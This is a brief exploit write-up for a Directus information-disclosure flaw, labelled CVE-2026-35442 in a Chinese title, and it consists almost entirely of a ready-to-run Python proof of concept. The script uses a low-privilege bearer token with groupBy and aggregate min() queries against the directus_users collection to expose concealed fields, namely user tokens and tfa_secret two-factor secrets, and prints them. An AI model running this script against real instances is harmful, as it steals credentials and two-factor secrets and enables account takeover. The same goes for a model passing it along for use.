CVE-2026-35442 Directus敏感信息泄露漏洞

import requests # Target configuration target_url = "http://your-directus-instance/items/directus_users" access_token = "YOUR_LOW_PRIVILEGE_TOKEN" # Token of a user with read access # Exploit payload: Using aggregate function 'min' on a concealed field (e.g., 'token') # Combined with 'groupBy' to bypass the conceal logic and expose raw values. payload = { "groupBy[]": ["id"], "fields": ["id", "min(token)", "min(tfa_secret)"] # Targeting concealed fields } headers = { "Authorization": f"Bearer {access_token}" } try: response = requests.get(target_url, headers=headers, params=payload) if response.status_code == 200: print("[+] Exploit successful! Sensitive data extracted:") print(response.json()) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")